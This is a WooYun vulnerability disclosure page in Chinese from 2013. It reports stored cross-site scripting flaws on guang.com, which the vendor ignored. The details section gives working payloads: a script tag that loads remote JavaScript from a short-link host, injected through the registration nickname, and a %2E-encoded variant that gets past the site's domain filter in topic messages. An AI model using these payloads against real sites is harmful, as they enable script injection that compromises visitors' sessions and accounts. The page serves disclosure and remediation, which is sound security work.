当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-045352

漏洞标题:Guang.com多处存储型xss漏洞

相关厂商:逛(guang.com)

漏洞作者: waterbug

提交时间:2013-12-09 16:01

修复时间:2013-12-14 16:01

公开时间:2013-12-14 16:01

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-12-09: 细节已通知厂商并且等待厂商处理中
2013-12-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

后台过滤不严导致存储型xss

详细说明:

首先来说说用户昵称,在注册的时候前台有检测但是后台却没有。禁用js后,昵称输入<script src="http://t.cn/8kVihEe"></script>宇宙大船长,这样明显可以直接提交,如果不想一下就被测出来,你可以做成只能有js提交,如果想避免,那么你后台该过滤就过滤,该正则就正则。我不明白的是你修改昵称都验证了,怎么创建用户的时候不验证,还有就是,我发现你们大量的html标签属性里面如:alt/titile等都有昵称输出,所以这个还是过滤的好,不建议转义。
然后再说说主题:主题标题只做了字数限制,没有过滤,然后是寄语,还好你们不允许发链接做了过滤,但是.+域名后缀扫一下就可以过滤?.可以编码有木有的啊。<script src="http://t%2Ecn/8kVihEe"></script>轻松绕过。
只看了这两地方,目测还有很多,好像你们也不大关心xss,如果估计被利用起来死伤一大片

漏洞证明:

QQ截图20131209001416.png


QQ截图20131209001450.png


QQ截图20131209004007.png


QQ截图20131209004257.png

修复方案:

加强过滤/转义输出

版权声明:转载请注明来源 waterbug@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-12-14 16:01

厂商回复:

最新状态:

暂无

漏洞评价:

评论